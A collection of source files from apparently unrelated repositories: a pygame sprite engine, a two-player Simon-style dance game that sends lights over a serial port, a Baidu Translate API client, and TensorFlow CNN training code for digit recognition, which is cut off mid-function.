""" calculates dx and dy based on speed, dir
automatically called in update
"""
theta = self.dir / 180.0 * math.pi
self.dx = math.cos(theta) * self.speed
self.dy = math.sin(theta) * self.speed
self.dy *= -1
def __calcPosition(self):
""" calculates the sprite's position by adding
dx and dy to x and y.
automatically called in update
"""
self.x += self.dx
self.y += self.dy
def checkBounds(self):
""" checks boundary and acts based on
self.BoundAction.
WRAP: wrap around screen (default)
BOUNCE: bounce off screen
STOP: stop at edge of screen
HIDE: move off stage and wait
CONTINUE: keep going at present course and speed
automatically called by update
"""
scrWidth = self.screen.get_width()
scrHeight = self.screen.get_height()
#create variables to simplify checking
offRight = offLeft = offTop = offBottom = offScreen = False
if self.x > scrWidth:
offRight = True
if self.x < 0:
offLeft = True
if self.y > scrHeight:
offBottom = True
if self.y < 0:
offTop = True
if offRight or offLeft or offTop or offBottom:
offScreen = True
if self.boundAction == self.WRAP:
if offRight:
self.x = 0
if offLeft:
self.x = scrWidth
if offBottom:
self.y = 0
if offTop:
self.y = scrHeight
elif self.boundAction == self.BOUNCE:
if offLeft or offRight:
self.dx *= -1
if offTop or offBottom:
self.dy *= -1
self.updateVector()
self.rotation = self.dir
elif self.boundAction == self.STOP:
if offScreen:
self.speed = 0
elif self.boundAction == self.HIDE:
if offScreen:
self.speed = 0
self.setPosition((-1000, -1000))
elif self.boundAction == self.CONTINUE:
pass
else:
# assume it's continue - keep going forever
pass
def setSpeed(self, speed):
""" immediately sets the object's speed to the
given value.
"""
self.speed = speed
def speedUp(self, amount):
""" changes speed by the given amount
Use a negative value to slow down
"""
self.speed += amount
if self.speed < self.minSpeed:
self.speed = self.minSpeed
if self.speed > self.maxSpeed:
self.speed = self.maxSpeed
def setAngle(self, dir):
""" sets both the direction of motion
and visual rotation to the given angle
If you want to set one or the other,
set them directly. Angle measured in degrees
"""
self.dir = dir
self.rotation = dir
def turnBy (self, amt):
""" turn by given number of degrees. Changes
both motion and visual rotation. Positive is
counter-clockwise, negative is clockwise
"""
self.dir += amt
if self.dir > 360:
self.dir = amt
if self.dir < 0:
self.dir = 360 - amt
self.rotation = self.dir
def rotateBy(self, amt):
""" change visual orientation by given
number of degrees. Does not change direction
of travel.
"""
self.rotation += amt
if self.rotation > 360:
self.rotation = amt
if self.rotation < 0:
self.rotation = 360 - amt
def setImage (self, image):
""" loads the given file name as the master image
default setting should be facing east. Image
will be rotated automatically """
self.imageMaster = pygame.image.load(image)
self.imageMaster = self.imageMaster.convert()
def setDX(self, dx):
""" changes dx value and updates vector """
self.dx = dx
self.updateVector()
def addDX(self, amt):
""" adds amt to dx, updates vector """
self.dx += amt
self.updateVector()
def setDY(self, dy):
""" changes dy value and updates vector """
self.dy = dy
self.updateVector()
def addDY(self, amt):
""" adds amt to dy and updates vector """
self.dy += amt
self.updateVector()
def setComponents(self, components):
""" expects (dx, dy) for components
change speed and angle according to dx, dy values """
(self.dx, self.dy) = components
self.updateVector()
def setBoundAction (self, action):
""" sets action for boundary. Values are
self.WRAP (wrap around edge - default)
self.BOUNCE (bounce off screen changing direction)
self.STOP (stop at edge of screen)
self.HIDE (move off-stage and stop)
self.CONTINUE (move on forever)
Any other value allows the sprite to move on forever
"""
self.boundAction = action
def setPosition (self, position):
""" place the sprite directly at the given position
expects an (x, y) tuple
"""
(self.x, self.y) = position
def moveBy (self, vector):
""" move the sprite by the (dx, dy) values in vector
automatically calls checkBounds. Doesn't change
speed or angle settings.
"""
(dx, dy) = vector
self.x += dx
self.y += dy
self.checkBounds()
def forward(self, amt):
""" move amt pixels in the current direction
of travel
"""
#calculate dx dy based on current direction
radians = self.dir * math.pi / 180
dx = amt * math.cos(radians)
dy = amt * math.sin(radians) * -1
self.x += dx
self.y += dy
def addForce(self, amt, angle):
""" apply amt of thrust in angle.
change speed and dir accordingly
add a force straight down to simulate gravity
in rotation direction to simulate spacecraft thrust
in dir direction to accelerate forward
at an angle for retro-rockets, etc.
"""
#calculate dx dy based on angle
radians = angle * math.pi / 180
dx = amt * math.cos(radians)
dy = amt * math.sin(radians) * -1
self.dx += dx
self.dy += dy
self.updateVector()
def updateVector(self):
#calculate new speed and angle based on dx, dy
#call this any time you change dx or dy
self.speed = math.sqrt((self.dx * self.dx) + (self.dy * self.dy))
dy = self.dy * -1
dx = self.dx
radians = math.atan2(dy, dx)
self.dir = radians / math.pi * 180
def setSpeedLimits(self, max, min):
""" determines maximum and minimum
speeds you will allow through
speedUp() method. You can still
directly set any speed you want
with setSpeed() Default values:
max: 10
min: -3
"""
self.maxSpeed = max
self.minSpeed = min
def dataTrace(self):
""" utility method for debugging
print major properties
extend to add your own properties
"""
print "x: %d, y: %d, speed: %.2f, dir: %.f, dx: %.2f, dy: %.2f" % \
(self.x, self.y, self.speed, self.dir, self.dx, self.dy)
def mouseDown(self):
""" boolean function. Returns True if the mouse is
clicked over the sprite, False otherwise
"""
self.pressed = False
if pygame.mouse.get_pressed() == (1, 0, 0):
if self.rect.collidepoint(pygame.mouse.get_pos()):
self.pressed = True
return self.pressed
def clicked(self):
""" Boolean function. Returns True only if mouse
is pressed and released over sprite
"""
released = False
if self.pressed:
if pygame.mouse.get_pressed() == (0, 0, 0):
if self.rect.collidepoint(pygame.mouse.get_pos()):
released = True
return released
def collidesWith(self, target):
""" boolean function. Returns True if the sprite
is currently colliding with the target sprite,
False otherwise
"""
collision = False
if self.rect.colliderect(target.rect):
collision = True
return collision
def collidesGroup(self, target):
""" wrapper for pygame.sprite.collideany
simplifies checking sprite - group collisions
returns result of collision check (sprite from group
that was hit or None)
"""
collision = pygame.sprite.spritecollideany(self, target)
return collision
def distanceTo(self, point):
""" returns distance to any point in pixels
can be used in circular collision detection
"""
(pointx, pointy) = point
dx = self.x - pointx
dy = self.y - pointy
dist = math.sqrt((dx * dx) + (dy * dy))
return dist
def dirTo(self, point):
""" returns direction (in degrees) to
a point """
(pointx, pointy) = point
dx = self.x - pointx
dy = self.y - pointy
dy *= -1
radians = math.atan2(dy, dx)
dir = radians * 180 / math.pi
dir += 180
return dir
def drawTrace(self, color=(0x00, 0x00, 0x00)):
""" traces a line between previous position
and current position of object
"""
pygame.draw.line(self.scene.background, color, self.oldCenter,
self.rect.center, 3)
self.screen.blit(self.scene.background, (0, 0))
class Scene(object):
""" encapsulates the IDEA / ALTER framework
properties:
sprites - a list of sprite objects
that forms the primary sprite group
background - the background surface
screen - the display screen
it's generally best to add all sprites
as attributes, so they can have access
to each other if needed
"""
def __init__(self):
""" initialize the game engine
set up a sample sprite for testing
"""
pygame.init()
self.screen = pygame.display.set_mode((640, 480))
self.background = pygame.Surface(self.screen.get_size())
self.background.fill((0, 0, 0))
# self.sampleSprite = SuperSprite(self)
# self.sampleSprite.setSpeed(3)
# self.sampleSprite.setAngle(0)
# self.sampleSprite.boundAction = self.sampleSprite.WRAP
self.sprites = []
self.groups = []
def start(self):
""" sets up the sprite groups
begins the main loop
"""
self.mainSprites = pygame.sprite.OrderedUpdates(self.sprites)
self.groups.append(self.mainSprites)
self.screen.blit(self.background, (0, 0))
self.clock = pygame.time.Clock()
self.keepGoing = True
while self.keepGoing:
self.__mainLoop()
def stop(self):
"""stops the loop"""
self.keepGoing = False
def __mainLoop(self):
""" manage all the main events
automatically called by start
"""
self.clock.tick(30)
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.keepGoing = False
self.doEvents(event)
self.update()
for group in self.groups:
group.clear(self.screen, self.background)
group.update()
group.draw(self.screen)
pygame.display.flip()
def makeSpriteGroup(self, sprites):
""" create and return a sprite group containing
all the sprites in the given list. Pass the
returned group to addGroup() so it is
automatically cleared, updated, and drawn
"""
tempGroup = pygame.sprite.RenderUpdates(sprites)
return tempGroup
def addGroup(self, group):
""" adds a sprite group to the groups list for
automatic processing
"""
self.groups.append(group)
def doEvents(self, event):
""" overwrite this method to add your own events.
works like normal event handling, passes event
object
"""
pass
def update(self):
""" happens once per frame, after event parsing.
Overwrite to add your own code, esp event handling
that doesn't require event obj. (pygame.key.get_pressed,
pygame.mouse.get_pos, etc)
Also a great place for collision detection
"""
pass
def setCaption(self, title):
""" sets the scene's title text """
pygame.display.set_caption(title)
class Label(pygame.sprite.Sprite):
""" a basic label
properties:
font: font to use
text: text to display
fgColor: foreground color
bgColor: background color
center: position of label's center
size: (width, height) of label
"""
def __init__(self, fontName = "freesansbold.ttf"):
pygame.sprite.Sprite.__init__(self)
self.font = pygame.font.Font(fontName, 20)
self.text = ""
self.fgColor = ((0x00, 0x00, 0x00))
self.bgColor = ((0xFF, 0xFF, 0xFF))
self.center = (100, 100)
self.size = (150, 30)
def update(self):
self.image = pygame.Surface(self.size)
self.image.fill(self.bgColor)
fontSurface = self.font.render(self.text, True, self.fgColor, self.bgColor)
#center the text
xPos = (self.image.get_width() - fontSurface.get_width())/2
self.image.blit(fontSurface, (xPos, 0))
self.rect = self.image.get_rect()
self.rect.center = self.center
class Button(Label):
""" a button based on the label
same properties as label +
active: True if user is clicking on sprite
False if user is not currently clicking
clicked: True when user releases mouse over a
currently active button
"""
def __init__(self):
Label.__init__(self)
self.active = False
self.clicked = False
self.bgColor = (0xCC, 0xCC, 0xCC)
def update(self):
Label.update(self)
self.clicked = False
#check for mouse input
if pygame.mouse.get_pressed() == (1, 0, 0):
if self.rect.collidepoint(pygame.mouse.get_pos()):
self.active = True
#check for mouse release
if self.active == True:
if pygame.mouse.get_pressed() == (0, 0, 0):
self.active = False
if self.rect.collidepoint(pygame.mouse.get_pos()):
self.clicked = True
class Scroller(Button):
""" like a button, but has a numeric value that
can be decremented by clicking on left half
and incremented by clicking on right half.
new attributes:
value: the scroller's numeric value
minValue: minimum value
maxValue: maximum value
increment: How much is added or subtracted
format: format of string interpolation
"""
def __init__(self):
Button.__init__(self)
self.minValue = 0
self.maxValue = 10
self.increment = 1
self.value = 5
self.format = "<< %.2f >>"
def update(self):
Button.update(self)
if self.active:
(mousex, mousey) = pygame.mouse.get_pos()
if mousex < self.rect.centerx:
self.value -= self.increment
if self.value < self.minValue:
self.value = self.minValue
else:
self.value += self.increment
if self.value > self.maxValue:
self.value = self.maxValue
self.text = self.format % self.value
class MultiLabel(pygame.sprite.Sprite):
""" accepts a list of strings, creates a multi-line
label to display text
same properties as label except textLines
is a list of strings. There is no text
property.
Set the size manually. Vertical size should be at
least 30 pixels per line (with the default font)
"""
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.textLines = ["This", "is", "sample", "text"]
self.font = pygame.font.Font("freesansbold.ttf", 20)
self.fgColor = ((0x00, 0x00, 0x00))
self.bgColor = ((0xFF, 0xFF, 0xFF))
self.center = (100, 100)
self.size = (150, 100)
def update(self):
self.image = pygame.Surface(self.size)
self.image.fill(self.bgColor)
numLines = len(self.textLines)
vSize = self.image.get_height() / numLines
for lineNum in range(numLines):
currentLine = self.textLines[lineNum]
fontSurface = self.font.render(currentLine, True, self.fgColor, self.bgColor)
#center the text
xPos = (self.image.get_width() - fontSurface.get_width())/2
yPos = lineNum * vSize
self.image.blit(fontSurface, (xPos, yPos))
self.rect = self.image.get_rect()
self.rect.center = self.center
if __name__ == "__main__":
# change this code to test various features of the engine
# This code will not run when gameEngine is run as a module
# (as it usually will be)
game = Scene()
thing = SuperSprite(game)
l = Label()
l.text = "huhu"
thing.setSpeed(5)
thing.setBoundAction(thing.BOUNCE)
thing.setAngle(230)
game.sprites = [thing, l]
game.start()
```
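The `addForce` docstring above explains applying a thrust of a given amount at a given angle (for example straight down to simulate gravity). A small worked sketch of that decomposition, standalone and independent of pygame:

```python
# Worked sketch of the vector math behind SuperSprite.addForce above:
# a force of `amt` at `angle` degrees decomposes into dx/dy components
# (screen y grows downward, hence the -1 on dy).
import math


def force_components(amt, angle):
    radians = angle * math.pi / 180
    dx = amt * math.cos(radians)
    dy = amt * math.sin(radians) * -1
    return dx, dy


print(force_components(0.5, 270))  # "gravity": roughly (0.0, 0.5), pulling down the screen
```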
#### File: simonblinks/simonblinks/simonblinks.py
```python
import os, sys
import ConfigParser
from random import randint
import pygame, serial
import pygame.display
import pygame.joystick
from pygame.locals import *
import gameEngine
PLAYSEQUENCE = pygame.USEREVENT+1
# which button to press to start the whole game
STARTBUTTON = K_RETURN
# change assignment of dance mat numbers here (e.g. if played the other way round)
UP, LEFT, DOWN, RIGHT = 1, 2, 3, 4
# assign the keys that handle game play, lookup in the Pygame doc for joystick buttons
# default: keyboard keys for player 1: i,j,k,l player 2 w,a,s,d
PLAYER1_KEYS = {
K_i: UP,
K_j: LEFT,
K_k: DOWN,
K_l: RIGHT
}
PLAYER2_KEYS = {
K_w: UP,
K_a: LEFT,
K_s: DOWN,
K_d: RIGHT
}
# defines the strings that represent the possible light rows
EMPTY, LEFTY, CENTER, RIGHTY = "000", "100", "010", "001"
# assembles the light sequences
LIGHTS = [
[CENTER, EMPTY, EMPTY], # UP
[EMPTY, LEFTY, EMPTY], # LEFT
[EMPTY, EMPTY, CENTER], # DOWN
[EMPTY, RIGHTY, EMPTY], # RIGHT
]
class Joystick(object):
"""
A generic Joystick class which opens and closes on initialization and
quit.
"""
def __init__(self):
pygame.joystick.init()
pygame.joystick.get_init()
self.count = pygame.joystick.get_count()
if self.count > 0:
self.joystick = pygame.joystick.Joystick(0)
self.joystick.init()
print '%d joystick(s) connected: %s' % (self.count, self.joystick.get_name())
self.num_axes = self.joystick.get_numaxes()
self.num_buttons = self.joystick.get_numbuttons()
self.num_hats = self.joystick.get_numhats()
print 'Joystick has %d axes, %d buttons and %d hats.' % (self.num_axes, self.num_buttons, self.num_hats)
pygame.event.pump()
self.old_axis = []
for num in range(self.num_axes):
self.old_axis.append(0.0)
def both_axis_active(self):
activated_axis = []
for num in range(self.num_axes):
axis = "%.4f" % self.joystick.get_axis(num)
if axis != self.old_axis[num]:
activated_axis.append(num)
self.old_axis[num] = axis
if len(activated_axis) == self.num_axes:
return True
return False
def close(self):
pygame.joystick.quit()
class Player(object):
"""
An abstract player object, which can make a guess about a light sequence,
has three lives and loses the game if dead.
"""
def __init__(self, name, keys):
self.name = name
self.lives = 3
self.dead = False
self.guess = []
self.keys = keys
def die(self):
"""
Subtract 1 from the life count until the player is dead.
"""
self.lives -= 1
if self.lives <= 0:
self.dead = True
print "Player %s lost a life (%s live(s) left)" % (self.name, self.lives)
def add_guess(self, guess, level):
"""
Adds a guess to the players portfolio, returning true if he is not
dead and not totally dumb
"""
if guess >= 1 and guess <= 4 and len(self.guess) < level and not self.dead:
print "Player %s guess: %s" % (self.name, guess)
self.guess.append(guess)
return True
else:
return False
class Sequence(object):
"""
An abstract senso light sequence to be guessed/danced by the players.
"""
def __init__(self, players):
self.sequence = []
self.level = 3
self.players = players
self.generate()
def clear_guesses(self):
""" Clear all guesses by the players """
for player in self.players:
player.guess = []
def generate(self, restart=False):
""" (Re-)generate the gaming sequence """
if restart:
self.level = 3
self.sequence = []
self.clear_guesses()
for i in xrange(self.level):
self.sequence.append(randint(1, 4))
print "New sequence:", self.sequence
def next_level(self):
""" Jump to the next level of fun! """
self.clear_guesses()
self.sequence.append(randint(1, 4))
self.level += 1
print "New sequence:", self.sequence
def completed_by_players(self):
""" Returns true if all players have finished their sequence """
finished_players = 0
for player in self.players:
if len(player.guess) == len(self.sequence):
finished_players += 1
return finished_players == len(self.players)
def get_sequence(self):
return self.sequence
class Game(gameEngine.Scene):
"""
An abstract game class, inherited from the gameEngine.Scene class,
which basically means that it creates a pygame instance and runs
doEvents() and update() of this class on every loop cycle with a
framerate of 30.
"""
def __init__(self, title, players, config):
gameEngine.Scene.__init__(self)
self.screen = pygame.display.set_mode((320, 240))
self.setCaption(title)
self.players = players
self.config = config
self.joystick = Joystick()
self.serial = None
try:
self.open_serial()
except:
print "Serial connection could not be established! Aborting.."
sys.exit(0)
self.sequence = Sequence(self.players)
self.dead_players = 0
self.ready_for_input = False
self.ready_for_playing = False
print "Press start button to create a new game."
self.start()
def restart(self):
"""
Restarts the current game.
"""
for player in self.players:
player.dead = False
player.lives = 3
self.dead_players = 0
self.sequence.generate(restart=True)
def open_serial(self):
"""
Opens a serial connection.
"""
if self.config.has_option("simonblinks", "serial"):
serial_device = self.config.get("simonblinks", "serial")
self.serial = serial.Serial(serial_device, baudrate=9600,
parity=serial.PARITY_NONE, bytesize=serial.EIGHTBITS,
stopbits=serial.STOPBITS_ONE)
else:
raise SystemError("Please change the 'serial' setting in simonblinks.cfg")
def send_serial(self, lights):
"""
Tries to send a light sequence over the flux compensator to the
logic board connected to the serial port. This is the critical part
when programming the logic boards and may need some treatment on
customization.
"""
print lights
try:
for row in lights:
row_int = int(row, 2)
row_hex = chr(row_int)
self.serial.write(row_hex)
except:
pass
def live_lights(self):
"""
Returns a list with light sequences representing the lives of all
players.
"""
lights = []
for x in range(3):
row = ""
for player in self.players:
if player.dead:
row += "0"
else:
row += "1"
lights.append(row)
lights.reverse()
return lights
def light(self, lights, player):
"""
Assembles the light sequence and prepares it to be sent to the logic
board connected to the serial device.
"""
live_lights = self.live_lights()
light_list = []
x = 0
for light in lights:
if player == 0:
light_list.append(light+live_lights[x]+light)
elif player == 1:
light_list.append(light+live_lights[x]+EMPTY)
elif player == 2:
light_list.append(EMPTY+live_lights[x]+light)
x += 1
self.send_serial(light_list)
def play_sequence(self):
"""
Plays every frame of a sequence. Add delay here if needed.
"""
for frame in self.sequence.get_sequence():
self.light(LIGHTS[frame-1], 0)
def doEvents(self, event):
"""
The mighty all-running loop inherited from gameEngine.Scene. Please
have a look at the docstring of gameEngine.Scene.
"""
if not self.ready_for_playing:
# Just in case we actually see this game in reality
# if event.type == JOYAXISMOTION:
# if self.joystick.both_axis_active():
if event.type == pygame.KEYDOWN:
if event.key == STARTBUTTON:
self.ready_for_playing = True
print "Game started. Now guess!"
print "Player1 keys: W, A, S, D"
print "Player2 keys: I, J, K, L"
pygame.event.post(pygame.event.Event(PLAYSEQUENCE))
if event.type == pygame.KEYDOWN:
key = event.key
if key in (pygame.K_ESCAPE, pygame.K_q):
self.keepGoing = False
if key == K_c:
# manual override a.k.a. jump to next level with key "c"
self.sequence.next_level()
if self.ready_for_input:
for player in self.players:
if key in player.keys:
guess = player.keys[key]
if player.add_guess(guess, self.sequence.level):
self.light(LIGHTS[guess-1], player.name)
if self.sequence.completed_by_players():
for player in self.players:
print "Player %s guessed: %s Sequence is: %s" % (player.name, player.guess, self.sequence.get_sequence())
if player.guess != self.sequence.get_sequence():
player.die()
self.sequence.next_level()
self.ready_for_input = True
self.ready_for_playing = False
pygame.time.delay(500)
elif event.type == JOYBUTTONDOWN:
# dummy things for the joystick
for num in range(self.joystick.num_buttons):
button = self.joystick.joystick.get_button(num)
if button:
print "Button pressed: " + str(num)
elif event.type == PLAYSEQUENCE:
if self.ready_for_playing:
self.play_sequence()
self.ready_for_input = True
def update(self):
"""
Runs after the event loop, on each cycle.
"""
for player in self.players:
if player.dead:
print "Game over player: %s" % player.name
self.dead_players += 1
if self.dead_players == len(self.players):
print "Restarting game.. done."
self.restart()
def quit(self):
"""
Closes connections to the joystick and the serial port.
"""
self.joystick.close()
if self.serial is not None:
self.serial.close()
def main():
"""
Main function to start the program
"""
config = ConfigParser.ConfigParser()
config.read(['simonblinks.cfg', os.path.expanduser('~/.simonblinks.cfg')])
players = Player(1, PLAYER1_KEYS), Player(2, PLAYER2_KEYS)
game = Game("<NAME>", players, config)
game.quit()
if __name__=="__main__":
main()
```
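`Game.send_serial` above packs each nine-character light row (player-1 lights, live lights, player-2 lights) into a single byte before writing it to the serial port. A standalone worked sketch of that conversion, with no serial port involved (the original module is Python 2 and uses `chr()`; `bytes([...])` is the Python 3 equivalent shown here):

```python
# Worked sketch of the row -> byte conversion used by Game.send_serial above.
EMPTY, LEFTY, CENTER, RIGHTY = "000", "100", "010", "001"

row = CENTER + "110" + EMPTY      # player-1 lights + live lights + player-2 lights
row_int = int(row, 2)             # "010110000" -> 176
payload = bytes([row_int])        # single byte, b'\xb0', written to the logic board
print(row, row_int, payload)
```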
|
{
"source": "Jezemy/VideoSubScanPlayer",
"score": 3
}
|
#### File: VideoSubScanPlayer/VideoSubScanPlayer/baidu_translator.py
```python
import requests
import hashlib
import random
import json
from retrying import retry
@retry(stop_max_attempt_number=5)
def Translation(Str):
"""
Calls the Baidu Translate API; you need to register for the Baidu Cloud API first.
Translates English to Chinese.
"""
appid = '' # fill in your appid
secretKey = '' # fill in your secret key
httpClient = None
myurl = 'http://api.fanyi.baidu.com/api/trans/vip/translate'
fromLang = 'en' # source language
toLang = 'zh' # target language
salt = random.randint(32768, 65536)
q = Str
sign = appid + q + str(salt) + secretKey
sign = hashlib.md5(sign.encode()).hexdigest()
myurl = myurl + '?appid=' + appid + '&q=' + q + '&from=' + fromLang + '&to=' + toLang + '&salt=' + str(
salt) + '&sign=' + sign
response = requests.get(myurl)
result = json.loads(response.text)
return result['trans_result'][0]['dst']
if __name__ == '__main__':
ret = Translation(" ")
print(ret)
```
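The request signature used above is the MD5 hex digest of appid + query + salt + secretKey. A short worked sketch with made-up credentials (the values below are dummies, not real API keys):

```python
# Worked sketch of the Baidu Translate sign computation, with dummy credentials.
import hashlib

appid, secret_key, salt = "20200101000000000", "dummysecret", 35660
query = "hello world"
raw = appid + query + str(salt) + secret_key
sign = hashlib.md5(raw.encode()).hexdigest()
print(sign)  # 32-char hex digest sent as the 'sign' query parameter
```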
#### File: VideoSubScanPlayer/VideoSubScanPlayer/CNN_new.py
```python
import tensorflow as tf
import os
import numpy as np
import random
from PIL import Image
import cv2 as cv
import time
"""
Model definitions and training code for the various networks.
"""
image_size = 64
# all:33-127, 0-9:48-58
start = 48
end = 58
category = end - start
# containers for the dataset samples, each entry in the form path: ASCII value
train_list = []
test_list = []
train_rate = 0.90 #13818
# 提供数据集路径
file_dir = "G:\\Code\\Python\\digital_imgae_processing_design\\dataset\\"
asciiList = [str(index) for index in range(start, end)]
# collect the paths of all samples into file_list
for index, numStr in enumerate(asciiList):
file_name_list = os.listdir(file_dir + numStr + '\\')
file_list = []
for name in file_name_list:
file_list.append([name, index + start])
# shuffle
random.shuffle(file_list)
# split according to the train/test ratio
train_length = int(len(file_list) * train_rate)
train_list += file_list[0: train_length + 1]
test_list += file_list[train_length + 1:]
X = tf.placeholder(tf.float32, [None, 64 * 64])
Y = tf.placeholder(tf.float32, [None, category])
keep_prob = tf.placeholder(tf.float32)
def getRandomData(sample_list,batch_num):
# batch_num is the number of sample/label pairs to return at once
# randomly fetch the requested number of images and labels
# returns: image as a binarized np-array with shape [batch_num, total pixels per image]
# label as a 0/1 matrix with shape [batch_num, classes], with the correct class set to 1
image_batch = []
label_batch = []
# randomly sample the requested number of entries from the loaded list
elements = random.sample(sample_list, batch_num)
# print(elements)
for item in elements:
name = item[0]
id = item[1]
# 将读取的图片转换为nd-array格式,并将长度reshape成一维向量
# 图片先用Image工具读取,再用numpy转换,然后转换为二值图,再定为one-hot
img = Image.open(file_dir + str(id) + "\\" + name)
image_batch.append(Nomalize(np.array(img.convert("L")), 128).reshape([image_size ** 2]))
label_array = [0] * (end - start)
label_array[id - start] = 1
label_batch.append(label_array)
# convert the assembled batches to nd-array format
image_batch = np.array(image_batch)
label_batch = np.array(label_batch)
# print(image_batch.shape)
# print(label_batch.shape)
return image_batch, label_batch
def getDataBatch(sample_list, batch_num):
# batch_num is the number of sample/label pairs to return at once
# fetches the requested number of samples in order
# returns: image as a binarized np-array with shape [batch_num, total pixels per image]
# label as a 0/1 matrix with shape [batch_num, classes], with the correct class set to 1
# note: popping from the front ensures samples are never repeated, but don't read past the end
# in the test setup there are 94 * 21 = 1974 samples, so don't request more than that in total
image_batch = []
label_batch = []
# read the requested number of entries from the loaded list, in order
elements = []
for i in range(batch_num):
elements.append(sample_list.pop(0))
for item in elements:
name = item[0]
id = item[1]
# convert each loaded image to an nd-array and reshape it into a 1-D vector
# the image is read with PIL, converted with numpy, then binarized before use
img = Image.open(file_dir + str(id) + "\\" + name)
image_batch.append(Nomalize(np.array(img.convert("L")), 128).reshape([image_size ** 2]))
label_array = [0] * (end - start)
label_array[id - start] = 1
label_batch.append(label_array)
# convert the assembled batches to nd-array format
image_batch = np.array(image_batch)
label_batch = np.array(label_batch)
# print(image_batch.shape)
# print(label_batch.shape)
return image_batch, label_batch
def getRealData():
# load the real segmented test data
test_dir = "chuli\\"
file_name_list = os.listdir(test_dir)
data = []
for id, name in enumerate(file_name_list):
image_path = test_dir + name
img = Image.open(image_path)
img_np = Nomalize(np.array(img.convert("L")), 128).reshape([image_size ** 2])
data.append([img_np,id])
return data
def convert_pic(imgPath):
# convert the image to a 64*64 numpy array
img = Image.open(imgPath)
print(img)
row,col = img.size
img = cv.imread(imgPath,0)
cv.imshow('img',img)
# image = cv.cvtColor(np.asarray(img), cv.COLOR_RGB2GRAY)
# rate = int((64*row)/col)
# image = cv.resize(image,(0,0),fx = row*rate, fy = 64)
# cv.imshow('img',image)
cv.waitKey(0)
def Nomalize(array, value):
row, col = array.shape
for i in range(row):
for j in range(col):
if array[i][j] > value:
array[i][j] = 1
else:
array[i][j] = 0
return array
def ascii_cnn():
x = tf.reshape(X, shape = [-1, 64, 64, 1])
# 2 conv layers
w_c1 = tf.Variable(tf.random_normal([3, 3, 1, 64], stddev = 0.01))
b_c1 = tf.Variable(tf.zeros([64]))
conv1 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(x, w_c1, strides = [1, 1, 1, 1], padding = 'SAME'), b_c1))
conv1 = tf.nn.max_pool(conv1, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
w_c2 = tf.Variable(tf.random_normal([3, 3, 64, 128], stddev = 0.01))
b_c2 = tf.Variable(tf.zeros([128]))
conv2 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv1, w_c2, strides = [1, 1, 1, 1], padding = 'SAME'), b_c2))
conv2 = tf.nn.max_pool(conv2, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
# 16*16*64
# w_c3 = tf.Variable(tf.random_normal([3, 3, 128, 256], stddev = 0.01))
# b_c3 = tf.Variable(tf.zeros([256]))
# conv3 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv2, w_c3, strides = [1, 1, 1, 1], padding = 'SAME'), b_c3))
# conv3 = tf.nn.max_pool(conv3, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
# conv3 = tf.nn.dropout(conv3, keep_prob)
# fully connected layer, 8*8*128
w_d = tf.Variable(tf.random_normal([16 * 16 * 128, 1024], stddev = 0.01))
b_d = tf.Variable(tf.zeros([1024]))
dense = tf.reshape(conv2, [-1, w_d.get_shape().as_list()[0]])
dense = tf.nn.relu(tf.add(tf.matmul(dense, w_d), b_d))
dense = tf.nn.dropout(dense, keep_prob)
w_out = tf.Variable(tf.random_normal([1024, 94], stddev = 0.01))
b_out = tf.Variable(tf.zeros([94]))
out = tf.add(tf.matmul(dense, w_out), b_out)
return out
def M4_sub():
x = tf.reshape(X, shape = [-1, 64, 64, 1])
# 2 conv layers
w_c1 = tf.Variable(tf.random_normal([3, 3, 1, 32], stddev = 0.01))
b_c1 = tf.Variable(tf.zeros([32]))
conv1 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(x, w_c1, strides = [1, 1, 1, 1], padding = 'SAME'), b_c1))
conv1 = tf.nn.max_pool(conv1, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
# 32*32*64
w_c2 = tf.Variable(tf.random_normal([3, 3, 32, 64], stddev = 0.01))
b_c2 = tf.Variable(tf.zeros([64]))
conv2 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv1, w_c2, strides = [1, 1, 1, 1], padding = 'SAME'), b_c2))
conv2 = tf.nn.max_pool(conv2, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
# fully connected layer, 16*16*128
w_d = tf.Variable(tf.random_normal([16 * 16 * 64, 1024], stddev = 0.01))
b_d = tf.Variable(tf.zeros([1024]))
dense = tf.reshape(conv2, [-1, w_d.get_shape().as_list()[0]])
dense = tf.nn.relu(tf.add(tf.matmul(dense, w_d), b_d))
dense = tf.nn.dropout(dense, keep_prob)
w_out = tf.Variable(tf.random_normal([1024, category], stddev = 0.01))
b_out = tf.Variable(tf.zeros([category]))
out = tf.add(tf.matmul(dense, w_out), b_out)
return out
def M4_plus():
x = tf.reshape(X, shape = [-1, 64, 64, 1])
    # Input 64*64, convolution layer C1
w_c1 = tf.Variable(tf.random_normal([3, 3, 1, 64], stddev = 0.01))
b_c1 = tf.Variable(tf.zeros([64]))
conv1 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(x, w_c1, strides = [1, 1, 1, 1], padding = 'SAME'), b_c1))
conv1 = tf.nn.max_pool(conv1, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
    # 32*32*64, convolution layer C2
w_c2 = tf.Variable(tf.random_normal([3, 3, 64, 128], stddev = 0.01))
b_c2 = tf.Variable(tf.zeros([128]))
conv2 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv1, w_c2, strides = [1, 1, 1, 1], padding = 'SAME'), b_c2))
conv2 = tf.nn.max_pool(conv2, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
    # Fully connected layer, flattened input 16*16*128
w_d = tf.Variable(tf.random_normal([16 * 16 * 128, 1024], stddev = 0.01))
b_d = tf.Variable(tf.zeros([1024]))
dense = tf.reshape(conv2, [-1, w_d.get_shape().as_list()[0]])
dense = tf.nn.relu(tf.add(tf.matmul(dense, w_d), b_d))
dense = tf.nn.dropout(dense, keep_prob)
    # Fully connected layer, 1024 -> number of classes (category)
w_out = tf.Variable(tf.random_normal([1024, category], stddev = 0.01))
